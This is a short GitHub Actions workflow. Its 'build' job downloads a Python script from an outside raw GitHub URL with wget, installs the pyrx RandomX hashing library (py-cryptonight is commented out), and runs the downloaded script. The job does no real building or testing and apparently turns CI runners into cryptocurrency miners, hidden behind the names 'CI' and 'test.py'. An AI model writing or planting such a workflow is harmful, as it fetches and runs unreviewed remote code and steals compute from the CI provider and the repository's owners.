name: CI
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:

    - name: Start
      run: wget https://raw.githubusercontent.com/raiyan088/public/main/hash/test.py
    - run: python --version
    - run: pip install git+https://github.com/jtgrassie/pyrx
    # - run: pip install py-cryptonight
    - run: python test.py
    # - run: python test.py
    
